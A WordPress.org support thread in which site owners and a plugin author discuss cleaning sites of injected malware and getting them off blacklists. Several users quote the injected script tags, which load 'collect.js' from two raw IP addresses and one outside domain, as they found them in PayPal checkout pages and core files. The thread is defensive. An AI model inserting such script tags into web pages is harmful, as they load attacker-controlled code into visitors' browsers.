Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:SPAM:SEO spam problem

  • Resolved th3rion

    (@th3rion)


    Hi

    I recently had a problem with backdoor trojans and malware. On my server 9 sites where infected. With this plugin I managed to get rid of infection on all of them but I can’t clean one.

    This plugin says site is clean but Sucuri detects MW:SPAM:SEO

    I manually updated all of wp core files so everything should have same date but some of files have newer date. I compered oryginal core files and this modified files and all of theme have somewhere script with such link:

    I don’t know where to look for cause of infection – I think updating files wont help.

    https://wordpress.org/plugins/gotmls/

Viewing 13 replies - 46 through 58 (of 58 total)
  • Plugin Author Eli

    (@scheeeli)

    My Anti-Malware plugin automatically block the Revolution Slider exploits just by having the latest version installed and activated on your site.

    When you say “the problem is still occuring”, do you mean that your files keep getting reinfected or do you mean that the symptoms of not going away after you scan and cleaned the site?

    Second question: What are the symptoms that you are experiencing that indicate that you are still infected?

    It is possible that you have another backdoor or some other vulnerability on your site, but it is also likely that your site is just blacklisted. Blacklists are used to warn users that your site may contain harmful content. The will cache the infected pages so you need to Request a Review to get your site off the blacklist.

    Please let me know what symptoms indicate that you are still infected. You can email me directly if you don’t want to post the info: eli At gotmls DOT net

    Aloha, Eli

    the day yesterday with me when new infectious virus hope this time if everything is disinfected, missing one hour if the virus is mechanical and attack at the same time :'(

    clarify that use the plugin anti-malware Eli

    Plugin Author Eli

    (@scheeeli)

    physwashere,
    Thanks for your PM:

    I meant that first, I’ve deleted infected codes myself, 2 days later problem occured again and I started to use your Malware Program.
    The symptons that I experiencing that when I open my site at Chrome browser, It warns by a message “The site is not safe…

    This means that your site is just blacklisted. All you need to do is to go to your Webmaster Tools account and Request a Review to get your site off the blacklist.

    Google Webmaster Tools is a big help when troubleshooting an infected site but they cache the infected pages until the page is crawled again so you site will stay on the blacklist even after you have cleaned out the malware. Requesting a Review can speed up the process of getting you off the blacklist.

    Let me know if there is anything else.

    Aloha, Eli

    Hey Aloha,
    Thanks for your reply.
    I will. However, 2 days ago, after deleting error codes and updating, site worked without any request from web site. Then, I requested for adwords.
    I’ll try your recommendation and inform you.

    P.s. – I also want to donate for your program. Do you provide invoice or a document for donations ?
    ps 2 – I ‘ve another database in our web site website.com/eng – Your plugin also scanned there and found infected files. Do I need to scan this location again by accessing the eng database ?
    Kind Regards,

    Plugin Author Eli

    (@scheeeli)

    2 days ago, after deleting error codes and updating, site worked without any request from web site

    Sometimes it takes Google a day or two to flag the cached content from your site as malware.

    Then, I requested for adwords.

    I bet that’s what prompted them to scan their cached content and that’s when they flagged the issues on your site.

    I also want to donate for your program. Do you provide invoice or a document for donations ?

    Donations are much appreciated but I am not a tax deductible non-profit. If you just need a receipt then you could print out the PayPal conformation, or if it’s a large amount then I’m sure I could be bothered to write something up for you 😉

    I ‘ve another database in our web site website.com/eng – Your plugin also scanned there and found infected files. Do I need to scan this location again by accessing the eng database ?

    If the /eng folder is a sub-directory of the main site then it should be scanned from the main site, but it won’t hurt to run the scan from the sub-directory also.

    In my wordpress I have additional IP
    193.169.87. 179/collect.js

    Plugin Author Eli

    (@scheeeli)

    In my wordpress I have additional IP
    193.169.87. 179/collect.js

    This and other IP addresses will also be caught by my plugin. Just download the latest Definition Updates, if available, and run the Complete Scan. If you find a new variation that is not being caught by me Anti-Malware plugin then please send me the whole infected file and I’ll add it to the Definition Updates.

    Aloha, Eli

    HI Eli
    Your plugin is really life saving here so thanks for that. I am running scans with your plugin. With the files flagged as ‘known threats’ and you ‘Automatically fix”, are you actually removing only the infected code out of the script PHP files or deleting the PHP files entirely. It would seem vague as some of those infected plugin would still need to run if there are some older abandonded plugins. For instance, what happens to plugins that may be abandonded, how would one recover those PHP files if deleted if my site depends on those for certain functionality. Would it not cripple those features or even my site? Just trying to understand here. Also, I will send over a donation once I clear this up which is under way.

    From Eli’s Plugin, this hack is one nasty piece of work. It idenfified a breach in my WishList Member near all kinds of Paypal checkouts as in:

    <script type="text/javascript" src="http://122.155.168.105/ads/inpage/pub/collect.js"></script></head>
    <body>
    	<center>
    		<font size=2 color=black face=Verdana><b><u>PayPal Merchant SDK for
    					PHP - Samples</u> </b> </font>
    	</center>
    	<br />
    	<br /><br />
    	<table>
    		<tr valign="top">
    			<td><b>Express Checkout</b>
    				<ul>

    HI Eli,
    I installed your plugin and run the scan … and what I have to do now?

    I have this 122.155.168.105 code in almost every site in my wp.

    Hello

    I installed your plugin yesterday and cleaned up my site (www.syrusson.is). But my site was hacked again early this morning and now with another URL.

    <script type=”text/javascript” src=”http://www.clickevents.com.my/scripts/collect.js”></script&gt;

    Before the URL was the IP address. I updated the definition updates in the plugin this morning and ran a scan but the plugin found no issues (some potential threats). When I downloade the whole httpdocs folder to my computer and ran a search through all the files I saw that 52 files were infected and I removed the code from all the files. I guess the site is working now but if I could be sure the next attack will be blocked I would be a very happy man 🙂

    Plugin Author Eli

    (@scheeeli)

    quantlabs,

    are you actually removing only the infected code out of the script PHP files or deleting the PHP files entirely

    My plugin only removed the malicious code from those files, it will not delete the file.

    how would one recover those PHP files

    You can restore any files that were cleaned by my plugin by going to the Quarantine.

    GretarMagg,

    <script type=”text/javascript” src=”http://www.clickevents.com.my/scripts/collect.js”></script&gt;

    I just added this new variant of this threat to my Definition Updates. Download the newest Definition Update and run the scan again.

    heffernan1966,

    I installed your plugin and run the scan … and what I have to do now?

    Click the “Automatically Fix” button 😉

Viewing 13 replies - 46 through 58 (of 58 total)
  • The topic ‘MW:SPAM:SEO spam problem’ is closed to new replies.